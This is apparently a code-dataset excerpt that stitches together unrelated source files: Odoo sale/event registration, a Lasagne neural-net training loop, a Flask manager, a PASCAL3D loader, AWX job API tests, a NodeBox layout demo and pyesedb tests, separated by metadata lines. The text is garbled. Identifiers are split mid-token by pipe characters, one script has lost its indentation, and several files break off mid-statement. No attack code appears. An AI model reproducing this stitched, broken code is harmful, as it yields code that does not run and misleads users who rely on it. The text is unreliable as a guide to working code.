    # in addition to origin generic fields, add real relational fields to correctly
    # handle attendees linked to sale orders and their lines
    # TDE FIXME: maybe add an onchange on sale_order_id + origin
    sale_order_id = fields.Many2one('sale.order', string='Source Sale Order', ondelete='cascade')
    sale_order_line_id = fields.Many2one('sale.order.line', string='Sale Order Line', ondelete='cascade')

    @api.multi
    @api.constrains('event_ticket_id', 'state')
    def _check_ticket_seats_limit(self):
        """Forbid registering more attendees than the ticket has seats for."""
        for record in self:
            if record.event_ticket_id.seats_max and record.event_ticket_id.seats_available < 0:
                raise ValidationError(_('No more available seats for this ticket'))

    @api.multi
    def _check_auto_confirmation(self):
        """Disable auto-confirmation while a linked sale order is still a draft."""
        res = super(EventRegistration, self)._check_auto_confirmation()
        if res:
            orders = self.env['sale.order'].search([('state', '=', 'draft'), ('id', 'in', self.mapped('sale_order_id').ids)], limit=1)
            if orders:
                res = False
        return res

    @api.model
    def create(self, vals):
        """Create the registration and log its sale-order origin in the chatter."""
        res = super(EventRegistration, self).create(vals)
        if res.origin or res.sale_order_id:
            res.message_post_with_view('mail.message_origin_link',
                values={'self': res, 'origin': res.sale_order_id},
                subtype_id=self.env.ref('mail.mt_note').id)
        return res

    @api.model
    def _prepare_attendee_values(self, registration):
        """ Override to add sale related stuff """
        line_id = registration.get('sale_order_line_id')
        if line_id:
            registration.setdefault('partner_id', line_id.order_id.partner_id)
        att_data = super(EventRegistration, self)._prepare_attendee_values(registration)
        if line_id:
            # Fix: the original dict literal listed 'event_id' twice; the
            # redundant duplicate entry was removed.
            att_data.update({
                'event_id': line_id.event_id.id,
                'event_ticket_id': line_id.event_ticket_id.id,
                'origin': line_id.order_id.name,
                'sale_order_id': line_id.order_id.id,
                'sale_order_line_id': line_id.id,
            })
        return att_data
|
rafaelvalle/MDI | nnet_lasagne.py | Python | mit | 10,609 | 0.000189 | # code adapted from lasagne tutorial
# http://lasagne.readthedocs.org/en/latest/user/tutorial.html
import time
import os
from itertools import product
import numpy as np
from sklearn.cross_validation import KFold
import theano
from theano import tensor as T
import lasagne
from params import nnet_params_dict, feats_train_folder
def set_trace():
    """Drop into an IPython debugger at the caller's frame."""
    from IPython.core.debugger import Pdb
    import sys
    Pdb(color_scheme='Linux').set_trace(sys._getframe().f_back)
def build_network(input_var, input_shape, nonlins, depth=2,
                  widths=(1000, 1000, 10), drops=(0.2, 0.5)):
    """
    Build a stack of dense layers with optional dropout after each layer.

    Parameters
    ----------
    input_var : Theano symbolic variable or None (default: None)
        Variable representing a network input.
    input_shape : tuple of int or None (batchsize, rows, cols)
        input_shape of the input. Any element can be set to None to indicate
        that dimension is not fixed at compile time
    nonlins : sequence of callables
        Nonlinearity per layer; entry 0 is unused (input layer).
    depth : int
        Total number of layers including the input layer.
    widths : sequence of int
        Units per dense layer; entry 0 is unused (input layer).
    drops : sequence of float or None
        Dropout probability applied after each layer; None disables dropout
        for that layer.

    Returns
    -------
    The topmost lasagne layer of the constructed network.
    """
    # GlorotUniform is the default mechanism for initializing weights
    network = lasagne.layers.InputLayer(shape=input_shape, input_var=input_var)
    # Fixed: comparisons to None use `is not` (the old `!= None` invokes
    # __ne__, which misbehaves for array-like operands).
    if drops[0] is not None:
        network = lasagne.layers.DropoutLayer(network, p=drops[0])
    for i in range(1, depth):
        network = lasagne.layers.DenseLayer(network,
                                            widths[i],
                                            nonlinearity=nonlins[i])
        if drops[i] is not None:
            network = lasagne.layers.DropoutLayer(network, p=drops[i])
    return network
def floatX(X):
    # Cast to a numpy array in Theano's configured float dtype
    # (theano.config.floatX, e.g. float32 for GPU runs).
    return np.asarray(X, dtype=theano.config.floatX)
def zerosX(X):
    # Zero-filled array of shape X in Theano's configured float dtype.
    return np.zeros(X, dtype=theano.config.floatX)
def init_weights(shape):
    # Small Gaussian init (std 0.01) wrapped as a Theano shared variable so
    # the weights can be updated in-place during training.
    return theano.shared(floatX(np.random.randn(*shape) * 0.01))
def sgd(cost, params, gamma):
    """Vanilla gradient descent: pair each parameter with its updated value."""
    grads = T.grad(cost=cost, wrt=params)
    return [[p, p - g * gamma] for p, g in zip(params, grads)]
def model(X, w_h, w_o):
    """One sigmoid hidden layer followed by a softmax output layer."""
    hidden = T.nnet.sigmoid(T.dot(X, w_h))
    return T.nnet.softmax(T.dot(hidden, w_o))
def iterate_minibatches(inputs, targets, batchsize, shuffle=False):
    """Yield (inputs, targets) minibatches of exactly `batchsize` examples.

    Trailing examples that do not fill a whole batch are dropped. When
    `shuffle` is True, examples are visited in a random order.
    """
    assert len(inputs) == len(targets)
    order = None
    if shuffle:
        order = np.arange(len(inputs))
        np.random.shuffle(order)
    last_start = len(inputs) - batchsize
    for start in range(0, last_start + 1, batchsize):
        if shuffle:
            picks = order[start:start + batchsize]
        else:
            picks = slice(start, start + batchsize)
        yield inputs[picks], targets[picks]
def batch_ids(batch_size, x_train, train_idx):
    # Pair up (start, end) offsets tiling the selected training subset in
    # batch_size steps; a trailing partial batch is dropped (zip truncates).
    n_rows = len(x_train[train_idx])
    starts = range(0, n_rows, batch_size)
    ends = range(batch_size, n_rows, batch_size)
    return zip(starts, ends)
verbose = True
# train on every perturbed dataset
filepaths = np.loadtxt("include_data.csv", dtype=object, delimiter=",")
for (include, train_filename, test_filename) in filepaths:
if include == '1':
print '\nExecuting {}'.format(train_filename)
# Load training and test sets
x_train = np.load(os.path.join(feats_train_folder,
train_filename)).astype(np.float32)
y_train = x_train[:, -1].astype(int)
# y_train = (np.eye(2, dtype=np.float32)[x_train[:,-1].astype(int)])
# remove label column from x_train
x_train = x_train[:, :-1]
# Network topology
n_obs = x_train.shape[0]
n_inputs = x_train.shape[1]
n_outputs = len(np.unique(y_train))
# Cross-validation and Neural Net parameters
n_folds = nnet_params_dict['n_folds']
alphas = nnet_params_dict['alphas']
gammas = nnet_params_dict['gammas']
decay_rate = nnet_params_dict['decay_rate']
batch_sizes = nnet_params_dict['batch_sizes']
max_epoch = nnet_params_dict['max_epoch']
depth = nnet_params_dict['depth']
widths = nnet_params_dict['widths']
nonlins = nnet_params_dict['nonlins']
d | rops = nnet_params_dict['drops']
# Dictionary to store results
results_dict = {}
params_mat = [x for x in product(alphas, gammas, batch_sizes)]
params_mat = np.array(params_mat, dtype=theano.config.floatX)
params_mat = np.column_stack((param | s_mat,
zerosX(params_mat.shape[0]),
zerosX(params_mat.shape[0]),
zerosX(params_mat.shape[0])))
for param_idx in xrange(params_mat.shape[0]):
# load parameters for neural network model
alpha = params_mat[param_idx, 0]
gamma = params_mat[param_idx, 1]
batch_size = int(params_mat[param_idx, 2])
shape = (batch_size, x_train.shape[1])
# choose n_hidden nodes according to ...
n_hidden = int((n_obs / depth) / (alpha*(n_inputs+n_outputs)))
for i in range(1, depth-1):
widths[i] = n_hidden
model_str = ('\nalpha {} gamma {} batch size {} '
'n_hidden {} depth {}'
'\nnonlins {}'
'\ndrops {}'.format(alpha, gamma, batch_size,
n_hidden, depth, nonlins,
drops))
print model_str
# specify input and target theano data types
input_var = T.fmatrix('input')
target_var = T.ivector('target')
# build neural network model
network = build_network(input_var, shape, nonlins, depth, widths,
drops)
# create loss expression for training
"""
py_x = model(input_var, w_h, w_o)
y_x = T.argmax(py_x, axis=1)
cost = T.mean(T.nnet.categorical_crossentropy(py_x, target_var),
dtype=theano.config.floatX)
"""
prediction = lasagne.layers.get_output(network)
loss = lasagne.objectives.categorical_crossentropy(prediction,
target_var)
loss = loss.mean()
# create paraneter update expressions for training
"""
params = [w_h, w_o]
updates = sgd(cost, params, gamma=gamma)
"""
params = lasagne.layers.get_all_params(network, trainable=True)
updates = lasagne.updates.adadelta(loss, params,
learning_rate=gamma,
rho=decay_rate)
# create loss expression for validation and classification accuracy
# Deterministic forward pass to disable droupout layers
test_prediction = lasagne.layers.get_output(network,
deterministic=True)
test_loss = lasagne.objectives.categorical_crossentropy(
test_prediction,
target_var)
test_loss = test_loss.mean()
test_acc = T.mean(T.eq(T.argmax(test_prediction, axis=1),
target_var), dtype=theano.config.floatX)
# compile functions for performing training step and returning
# corresponding training loss
train_fn = theano.function(inputs=[input_var, target_var],
outputs=loss,
updates=updates,
allow_input_downcast=True)
# compile a function to compute the validation loss and accuracy
val_fn = theano.function(inputs=[input_var, target_var],
outputs=[test_loss, test_acc],
allow_input_downcast=True)
# create kfold iterator
kf = KFold(x_train.shape[0], n_folds=n_folds)
error_rates = []
val_losse |
jennywoites/MUSSA | MUSSA_Flask/manage.py | Python | gpl-3.0 | 879 | 0.003413 | """This file sets up a command line manager.
Use "python manage.py" for a list of available commands.
Use "python manage.py runserver" to start the development web server on localhost:5000.
Use "python manage.p | y runserver --help" for additional runserver options.
"""
from flask_migra | te import MigrateCommand
from flask_script import Manager, commands
from app import create_app
from app.commands import InitDbCommand
# Setup Flask-Script with command line commands
manager = Manager(create_app)  # Manager drives the app factory, not an app instance
manager.add_command('db', MigrateCommand)  # Flask-Migrate database migrations
manager.add_command('init_db', InitDbCommand)
# NOTE(review): host="0.0.0.0" binds all interfaces -- fine for a dev
# container; confirm this entry point is not used as-is in production.
manager.add_command('runserver', commands.Server(host="0.0.0.0", port=None, threaded=True))
if __name__ == "__main__":
    # python manage.py # shows available commands
    # python manage.py runserver --help # shows available runserver options
    manager.run()
|
OphidiaBigData/ophidia-wps-module | processes/__init__.py | Python | gpl-3.0 | 740 | 0.001351 | #
# Ophidia WPS Module
# Copyright (C) 2015-2021 CMCC Foundation
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free So | ftware Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You shoul | d have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
|
tonghuashuai/OnlyBoard | controller/_url.py | Python | mit | 68 | 0 | #!/usr/bin/env python
# | -*- coding: utf-8 -*-
import root
import j | |
Zardinality/TF_Deformable_Net | lib/datasets/pascal3d.py | Python | mit | 30,673 | 0.003293 | # --------------------------------------------------------
# Fast R-CNN
# Copyright (c) 2015 Microsoft
# Licensed under The MIT License [see LICENSE for details]
# Written by Ross Girshick
# --------------------------------------------------------
import xml.dom.minidom as minidom
import os
import PIL
import numpy as np
import scipy.sparse
import subprocess
import pickle
import math
import glob
import scipy.io as sio
from .imdb import imdb
from .imdb import ROOT_DIR
from ..utils.cython_bbox import bbox_overlaps
from ..utils.boxes_grid import get_boxes_grid
# TODO: make fast_rcnn irrelevant
# >>>> obsolete, because it depends on sth outside of this project
from ..fast_rcnn.config import cfg
from ..rpn_msr.generate_anchors import generate_anchors
# <<<< obsolete
class pascal3d(imdb):
def __init__(self, image_set, pascal3d_path = None):
imdb.__init__(self, 'pascal3d_' + image_set)
self._year = '2012'
self._image_set = image_set
self._pascal3d_path = self._get_default_path() if pascal3d_path is None \
else pascal3d_path
self._data_path = os.path.join(self._pascal3d_path, 'VOCdevkit' + self._year, 'VOC' + self._year)
self._classes = ('__background__', # always index 0
'aeroplane', 'bicycle', 'boat',
'bottle', 'bus', 'car', 'chair',
'diningtable', 'motorbike',
'sofa', 'train', 'tvmonitor')
self._class_to_ind = dict(list(zip(self.classes, list(range(self.num_classes)))))
self._image_ext = '.jpg'
self._image_index = self._load_image_set_index()
# Default to roidb handler
if cfg.IS_RPN:
self._roidb_handler = self.gt_roidb
else:
self._roidb_handler = self.region_proposal_roidb
# num of subclasses
if cfg.SUBCLS_NAME == 'voxel_exemplars':
self._num_subclasses = 337 + 1
elif cfg.SUBCLS_NAME == 'pose_exemplars':
self._num_subclasses = 260 + 1
else:
assert (1), 'cfg.SUBCLS_NAME not supported!'
# load the mapping for subcalss to class
filename = os.path.join(self._pascal3d_path, cfg.SUBCLS_NAME, 'mapping.txt')
assert os.path.exists(filename), 'Path does not exist: {}'.format(filename)
mapping = np.zeros(self._num_subclasses, dtype=np.int)
with open(filename) as f:
for line in f:
words = line.split()
subcls = int(words[0])
mapping[subcls] = self._class_to_ind[words[1]]
self._subclass_mapping = mapping
# PASCAL specific config options
self.config = {'cleanup' : True,
'use_salt' : True,
'top_k' : 2000}
# statistics for computing recall
self._num_boxes_all = np.zeros(self.num_classes, dtype=np.int)
self._num_boxes_covered = np.zeros(self.num_classes, dtype=np.int)
self._num_boxes_proposal = 0
assert os.path.exists(self._pascal3d_path), \
'PASCAL3D path does not exist: {}'.format(self._pascal3d_path)
assert os.path.exists(self._data_path), \
'Path does not exist: {}'.format(self._data_path)
def image_path_at(self, i):
"""
Return the absolute path to image i in the image sequence.
"""
return self.image_path_from_index(self._image_index[i])
def image_path_from_index(self, index):
"""
Construct an image path from the image's "index" identifier.
"""
image_path = os.path.join(self._data_path, 'JPEGImages',
index + self._image_ext)
assert os.path.exists(image_path), \
'Path does not exist: {}'.format(image_path)
return image_path
def _load_image_set_index(self):
"""
Load the indexes listed in this dataset's image set file.
"""
| # Example path to image set file:
# self._pascal3d_path + /VOCdevkit2012/VOC2012/ImageSets/Main/val.txt
image_set_file = os.path.join(self._data_path, 'ImageSets', 'Main',
self._image_set + '.txt')
assert os.path.exists(image_s | et_file), \
'Path does not exist: {}'.format(image_set_file)
with open(image_set_file) as f:
image_index = [x.strip() for x in f.readlines()]
return image_index
    def _get_default_path(self):
        """
        Return the default path where PASCAL3D is expected to be installed.
        """
        # ROOT_DIR is the repository root, imported from .imdb.
        return os.path.join(ROOT_DIR, 'data', 'PASCAL3D')
    def gt_roidb(self):
        """
        Return the database of ground-truth regions of interest.
        This function loads/saves from/to a cache file to speed up future calls.
        """
        cache_file = os.path.join(self.cache_path, self.name + '_' + cfg.SUBCLS_NAME + '_gt_roidb.pkl')
        if os.path.exists(cache_file):
            # NOTE(review): pickle.load is only safe here because the cache
            # is written by this same method below; never point it at
            # untrusted files.
            with open(cache_file, 'rb') as fid:
                roidb = pickle.load(fid)
            print('{} gt roidb loaded from {}'.format(self.name, cache_file))
            return roidb
        # Cache miss: build the roidb from the per-image annotations.
        gt_roidb = [self._load_pascal3d_voxel_exemplar_annotation(index)
                    for index in self.image_index]
        if cfg.IS_RPN:
            # print out recall
            # (the _num_boxes_* counters are presumably filled in during
            # annotation loading above -- confirm against the loader)
            for i in range(1, self.num_classes):
                print('{}: Total number of boxes {:d}'.format(self.classes[i], self._num_boxes_all[i]))
                print('{}: Number of boxes covered {:d}'.format(self.classes[i], self._num_boxes_covered[i]))
                print('{}: Recall {:f}'.format(self.classes[i], float(self._num_boxes_covered[i]) / float(self._num_boxes_all[i])))
        with open(cache_file, 'wb') as fid:
            pickle.dump(gt_roidb, fid, pickle.HIGHEST_PROTOCOL)
        print('wrote gt roidb to {}'.format(cache_file))
        return gt_roidb
def _load_pascal_annotation(self, index):
"""
Load image and bounding boxes info from XML file in the PASCAL VOC
format.
"""
filename = os.path.join(self._data_path, 'Annotations', index + '.xml')
# print 'Loading: {}'.format(filename)
def get_data_from_tag(node, tag):
return node.getElementsByTagName(tag)[0].childNodes[0].data
with open(filename) as f:
data = minidom.parseString(f.read())
objs = data.getElementsByTagName('object')
num_objs = len(objs)
boxes = np.zeros((num_objs, 4), dtype=np.uint16)
gt_classes = np.zeros((num_objs), dtype=np.int32)
overlaps = np.zeros((num_objs, self.num_classes), dtype=np.float32)
# Load object bounding boxes into a data frame.
for ix, obj in enumerate(objs):
# Make pixel indexes 0-based
x1 = float(get_data_from_tag(obj, 'xmin')) - 1
y1 = float(get_data_from_tag(obj, 'ymin')) - 1
x2 = float(get_data_from_tag(obj, 'xmax')) - 1
y2 = float(get_data_from_tag(obj, 'ymax')) - 1
name = str(get_data_from_tag(obj, "name")).lower().strip()
if name in self._classes:
cls = self._class_to_ind[name]
else:
cls = 0
boxes[ix, :] = [x1, y1, x2, y2]
gt_classes[ix] = cls
overlaps[ix, cls] = 1.0
overlaps = scipy.sparse.csr_matrix(overlaps)
gt_subclasses = np.zeros((num_objs), dtype=np.int32)
gt_subclasses_flipped = np.zeros((num_objs), dtype=np.int32)
subindexes = np.zeros((num_objs, self.num_classes), dtype=np.int32)
subindexes_flipped = np.zeros((num_objs, self.num_classes), dtype=np.int32)
subindexes = scipy.sparse.csr_matrix(subindexes)
subindexes_flipped = scipy.sparse.csr_matrix(subindexes_flipped)
if cfg.IS_RPN:
if cfg.IS_MULTISCALE:
# compute overlaps between grid boxes and gt boxes in multi-scales
# rescale the gt boxes
boxes_all = np.zeros((0, 4), dtype=np.float32)
|
kreativitea/RandomData | utils.py | Python | mit | 739 | 0.005413 | import os
import json
try:
import yaml
except ImportError:
yaml = None
def r | oot():
''' Assuming that this function is in root.utils, returns the root directory
of the | project. '''
path, _ = os.path.split(__file__)
return os.path.abspath(path)
def loadfile(filename, _format=None):
    ''' Loads a file at a particular `filename` location.

    _format selects post-processing: None returns the raw text, 'json'
    parses it as JSON, 'yaml' parses it as YAML (when PyYAML is installed),
    and 'split' returns whitespace-separated tokens. Unknown formats (and a
    missing yaml module) yield None.
    '''
    # `fh` instead of `file`: the old name shadowed the Python 2 builtin.
    with open(filename) as fh:
        data = fh.read()
    if not _format:
        return data
    elif _format == 'json':
        return json.loads(data)
    elif _format == 'yaml':
        if yaml:
            # NOTE(review): yaml.load without an explicit Loader is unsafe
            # on untrusted input; consider yaml.safe_load.
            return yaml.load(data)
        else:
            # print() form works under both Python 2 and Python 3.
            print("yaml support is not currently installed.")
    elif _format == 'split':
        return data.split()
|
wwitzel3/awx | awx/main/tests/functional/api/test_job.py | Python | apache-2.0 | 9,725 | 0.003496 | # Python
import pytest
import mock
from dateutil.parser import parse
from dateutil.relativedelta import relativedelta
from crum import impersonate
import datetime
# Django rest framework
from rest_framework.exceptions import PermissionDenied
from django.utils import timezone
# AWX
from awx.api.versioning import reverse
from awx.api.views import RelatedJobsPreventDeleteMixin, UnifiedJobDeletionMixin
from awx.main.models import (
JobTemplate,
User,
Job,
AdHocCommand,
ProjectUpdate,
)
@pytest.mark.django_db
def test_extra_credentials(get, organization_factory, job_template_factory, credential):
    """The job's extra_credentials endpoint lists the credentials attached
    to its job template (here: exactly one)."""
    objs = organization_factory("org", superusers=['admin'])
    jt = job_template_factory("jt", organization=objs.organization,
                              inventory='test_inv', project='test_proj').job_template
    jt.credentials.add(credential)
    jt.save()
    job = jt.create_unified_job()
    url = reverse('api:job_extra_credentials_list', kwargs={'version': 'v2', 'pk': job.pk})
    response = get(url, user=objs.superusers.admin)
    assert response.data.get('count') == 1
@pytest.mark.django_db
def test_job_relaunch_permission_denied_response(
        post, get, inventory, project, credential, net_credential, machine_credential):
    """An execute-only user may start the job, but relaunch is denied (403)
    once the job carries prompted credentials the user cannot use."""
    jt = JobTemplate.objects.create(name='testjt', inventory=inventory, project=project)
    jt.credentials.add(machine_credential)
    jt_user = User.objects.create(username='jobtemplateuser')
    jt.execute_role.members.add(jt_user)
    with impersonate(jt_user):
        job = jt.create_unified_job()
    # User capability is shown for this
    r = get(job.get_absolute_url(), jt_user, expect=200)
    assert r.data['summary_fields']['user_capabilities']['start']
    # Job has prompted extra_credential, launch denied w/ message
    job.launch_config.credentials.add(net_credential)
    r = post(reverse('api:job_relaunch', kwargs={'pk':job.pk}), {}, jt_user, expect=403)
    assert 'launched with prompted fields' in r.data['detail']
    assert 'do not have permission' in r.data['detail']
@pytest.mark.django_db
def test_job_relaunch_permission_denied_response_other_user(get, post, inventory, project, alice, bob):
    '''
    Asserts custom permission denied message corresponding to
    awx/main/tests/functional/test_rbac_job.py::TestJobRelaunchAccess::test_other_user_prompts
    '''
    jt = JobTemplate.objects.create(
        name='testjt', inventory=inventory, project=project,
        ask_credential_on_launch=True,
        ask_variables_on_launch=True)
    jt.execute_role.members.add(alice, bob)
    with impersonate(bob):
        job = jt.create_unified_job(extra_vars={'job_var': 'foo2'})
    # User capability is shown for this
    r = get(job.get_absolute_url(), alice, expect=200)
    assert r.data['summary_fields']['user_capabilities']['start']
    # Job has prompted data, launch denied w/ message
    # (alice cannot relaunch: the prompts were supplied by bob)
    r = post(reverse('api:job_relaunch', kwargs={'pk':job.pk}), {}, alice, expect=403)
    assert 'Job was launched with prompts provided by another user' in r.data['detail']
@pytest.mark.django_db
def test_job_relaunch_without_creds(post, inventory, project, admin_user):
    """A job from a credential-less template relaunches successfully (201)."""
    jt = JobTemplate.objects.create(
        name='testjt', inventory=inventory,
        project=project
    )
    job = jt.create_unified_job()
    post(
        url=reverse('api:job_relaunch', kwargs={'pk':job.pk}),
        data={},
        user=admin_user,
        expect=201
    )
@pytest.mark.django_db
@pytest.mark.parametrize("status,hosts", [
    ('all', 'host1,host2,host3'),
    ('failed', 'host3'),
])
def test_job_relaunch_on_failed_hosts(post, inventory, project, machine_credential, admin_user, status, hosts):
    """Relaunching with hosts='failed' narrows the limit to hosts whose
    summary recorded failures; 'all' keeps the original limit."""
    h1 = inventory.hosts.create(name='host1') # no-op
    h2 = inventory.hosts.create(name='host2') # changed host
    h3 = inventory.hosts.create(name='host3') # failed host
    jt = JobTemplate.objects.create(
        name='testjt', inventory=inventory,
        project=project
    )
    jt.credentials.add(machine_credential)
    job = jt.create_unified_job(_eager_fields={'status': 'failed'}, limit='host1,host2,host3')
    # playbook_on_stats marks the job's events as fully processed
    job.job_events.create(event='playbook_on_stats')
    job.job_host_summaries.create(host=h1, failed=False, ok=1, changed=0, failures=0, host_name=h1.name)
    job.job_host_summaries.create(host=h2, failed=False, ok=0, changed=1, failures=0, host_name=h2.name)
    job.job_host_summaries.create(host=h3, failed=False, ok=0, changed=0, failures=1, host_name=h3.name)
    r = post(
        url=reverse('api:job_relaunch', kwargs={'pk':job.pk}),
        data={'hosts': status},
        user=admin_user,
        expect=201
    )
    assert r.data.get('limit') == hosts
@pytest.mark.django_db
def test_summary_fields_recent_jobs(job_template, admin_user, get):
    """The job template detail lists only the 10 most recent jobs,
    newest first."""
    jobs = []
    for i in range(13):
        jobs.append(Job.objects.create(
            job_template=job_template,
            status='failed',
            created=timezone.make_aware(datetime.datetime(2017, 3, 21, 9, i)),
            finished=timezone.make_aware(datetime.datetime(2017, 3, 21, 10, i))
        ))
    r = get(
        url=job_template.get_absolute_url(),
        user=admin_user,
        # Fixed: this kwarg was misspelled `exepect`, so the response
        # status was silently never checked.
        expect=200
    )
    recent_jobs = r.data['summary_fields']['recent_jobs']
    assert len(recent_jobs) == 10
    assert recent_jobs == [{
        'id': job.id,
        'status': 'failed',
        'finished': job.finished,
        'type': 'job'
    } for job in jobs[-10:][::-1]]
@pytest.mark.django_db
def test_slice_jt_recent_jobs(slice_job_factory, admin_user, get):
    """For a sliced job template, recent_jobs lists the workflow wrapper
    job only, never its spawned slice joblets."""
    workflow_job = slice_job_factory(3, spawn=True)
    slice_jt = workflow_job.job_template
    r = get(
        url=slice_jt.get_absolute_url(),
        user=admin_user,
        expect=200
    )
    job_ids = [entry['id'] for entry in r.data['summary_fields']['recent_jobs']]
    # decision is that workflow job should be shown in the related jobs
    # joblets of the workflow job should NOT be shown
    assert job_ids == [workflow_job.pk]
@pytest.mark.django_db
def test_block_unprocessed_events(delete, admin_user, mocker):
    """DELETE is refused (400) when the job finished so recently that its
    emitted events may not all be processed yet."""
    time_of_finish = parse("Thu Feb 28 09:10:20 2013 -0500")
    job = Job.objects.create(
        emitted_events=1,
        status='finished',
        finished=time_of_finish
    )
    request = mock.MagicMock()
    class MockView(UnifiedJobDeletionMixin):
        model = Job
        def get_object(self):
            return job
    view = MockView()
    # Freeze "now" to 2s after finish, inside the event-processing grace window.
    time_of_request = time_of_finish + relativedelta(seconds=2)
    with mock.patch('awx.api.views.mixin.now', lambda: time_of_request):
        r = view.destroy(request)
        assert r.status_code == 400
@pytest.mark.django_db
def test_block_related_unprocessed_events(mocker, organization, project, delete, admin_user):
    """Deleting a resource whose related job finished moments ago raises
    PermissionDenied while that job's events may still be unprocessed."""
    job_template = JobTemplate.objects.create(
        project=project,
        playbook='helloworld.yml'
    )
    time_of_finish = parse("Thu Feb 23 14:17:24 2012 -0500")
    Job.objects.create(
        emitted_events=1,
        status='finished',
        finished=time_of_finish,
        job_template=job_template,
        project=project
    )
    view = RelatedJobsPreventDeleteMixin()
    # Freeze "now" to 2s after finish, inside the event-processing grace window.
    time_of_request = time_of_finish + relativedelta(seconds=2)
    with mock.patch('awx.api.views.mixin.now', lambda: time_of_request):
        with pytest.raises(PermissionDenied):
            view.perform_destroy(organization)
@pytest.mark.django_db
def test_disallowed_http_update_methods(put, patch, post, inventory, project, admin_user):
    """The job detail view is read-only: POST, PUT and PATCH all return 405."""
    jt = JobTemplate.objects.create(
        name='test_disallowed_methods', inventory=inventory,
        project=project
    )
    job = jt.create_unified_job()
    post(
        url=reverse('api:job_detail', kwargs={'pk': job.pk, 'version': 'v2'}),
        data={},
        user=admin_user,
        expect=405
    )
    put(
        url=reverse('api:job_detail', kwargs={'pk': job.pk, 'version': 'v2'}),
        data={},
        user=admin_user,
        expect=405
    )
    patch(
        url=reverse('api:job_detail', kwargs={'pk': job.pk, 'version': 'v2'}),
        data={},
        user=admin_user,
        expect=405
    )
class TestControlle |
pepsipepsi/nodebox_opengl_python3 | examples/10-gui/05-layout.py | Python | bsd-3-clause | 3,183 | 0.004713 | import os, sys
sys.path.insert(0, os.path.join("..",".."))
from nodebox.graphics impor | t *
from nodebox.gui.controls import *
# Comparison between Rows and Row containers.
# Both are subclasses of Layout.
# Panel 1
# Controls in a Rows layout are drawn below each other.
# Rows.width defines the width of all controls (individual width is ignored).
# Note how the second Field has a height and | wrap=True,
# which makes it a multi-line field with text wrapping.
panel1 = Panel("Panel 1", x=30, y=350)
panel1.append(
Rows([
Field(value="", hint="subject"),
Field(value="", hint="message", height=70, id="field_msg1", wrap=True),
Button("Send"),
], width=200)
)
panel1.pack()
# Panel 2
# Controls in a Row layout are drawn next to each other.
# Row.width defines the width of all controls (individual width is ignored).
# This means that each column has the same width.
# Note the align=TOP, which vertically aligns each column at the top (default is CENTER).
panel2 = Panel("Panel 2", x=30, y=200)
panel2.append(
Row([
Field(value="", hint="message", height=70, id="field_msg2", wrap=True),
Button("Send", width=400),
], width=200, align=TOP)
)
panel2.pack()
# Panel 3
# If you need columns of a different width, put a Layout in a column,
# in other words a Row or Rows nested inside a Row or Rows.
# Then put your controls in the nested layout,
# the layout's width will override the column width setting.
panel3 = Panel("Panel 3", x=30, y=30)
panel3.append(
Row([ # Field will be 200 wide, the Row column width setting.
Field(value="", hint="message", height=70, id="field_msg2", wrap=True),
("Actions:", Rows([
Button("Send"), # However, buttons will be 100 wide,
Button("Save") # because their Rows parent says so.
], width=100))
], width=200, align=TOP)
)
panel3.pack()
# Panel 4
# Without layouts, you are free to draw controls wherever you want in a panel.
# Panel.pack() will make sure that the panel fits snuggly around the controls.
# In this case, we place a button on the panel, with a field above it (hence y=40).
# The field has its own dimensions (width=300 and height=50).
panel4 = Panel("Panel 4", x=400, y=30)
panel4.extend([
Field(value="", hint="message", y=40, width=300, height=50, id="field_msg3", wrap=True, reserved=[]),
Button("Send")
])
panel4.pack()
# Note the reserved=[] with the field.
# By default, fields have ENTER and TAB keys reserved:
# enter fires Field.on_action(), tab moves away from the field.
# By clearing the reserved list we can type enter and tab inside the field.
# Panel 5
# If you don't pack the panel, you have to set its width and height manually,
# as well as the position of all controls:
panel5 = Panel("Panel 5", x=500, y=200, width=200, height=150)
panel5.extend([
Field(value="", hint="message", x=10, y=60, width=180, height=50, id="field_msg3", wrap=True),
Button("Send", x=10, y=20, width=180)
])
def draw(canvas):
    # Redraw each frame: wipe the canvas, then re-attach every demo panel.
    canvas.clear()
    for panel in (panel1, panel2, panel3, panel4, panel5):
        canvas.append(panel)
canvas.size = 800, 600
canvas.run(draw)  # start the event loop; draw() is invoked every frame
libyal/libesedb | tests/pyesedb_test_file.py | Python | lgpl-3.0 | 5,223 | 0.006701 | #!/usr/bin/env python
#
# Python-bindings file type test script
#
# Copyright (C) 2009-2021, Joachim Metz <joachim.metz@gmail.com>
#
# Refer to AUTHORS for acknowledgements.
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public License
# along with this program. If not, see <https://www.gnu.org/licenses/>.
import argparse
import os
import sys
import unittest
import pyesedb
class FileTypeTests(unittest.TestCase):
  """Tests the file type.

  All tests other than test_signal_abort require ``unittest.source`` to be
  set to the path of a test file (see the __main__ block); they are skipped
  otherwise.
  """

  def test_signal_abort(self):
    """Tests the signal_abort function."""
    esedb_file = pyesedb.file()

    esedb_file.signal_abort()

  def test_open(self):
    """Tests the open function."""
    test_source = unittest.source
    if not test_source:
      raise unittest.SkipTest("missing source")

    esedb_file = pyesedb.file()

    esedb_file.open(test_source)

    # A file cannot be opened twice.
    with self.assertRaises(IOError):
      esedb_file.open(test_source)

    esedb_file.close()

    with self.assertRaises(TypeError):
      esedb_file.open(None)

    # Only read-only access is supported.
    with self.assertRaises(ValueError):
      esedb_file.open(test_source, mode="w")

  def test_open_file_object(self):
    """Tests the open_file_object function."""
    test_source = unittest.source
    if not test_source:
      raise unittest.SkipTest("missing source")

    if not os.path.isfile(test_source):
      raise unittest.SkipTest("source not a regular file")

    esedb_file = pyesedb.file()

    with open(test_source, "rb") as file_object:
      esedb_file.open_file_object(file_object)

      # A file cannot be opened twice.
      with self.assertRaises(IOError):
        esedb_file.open_file_object(file_object)

      esedb_file.close()

      with self.assertRaises(TypeError):
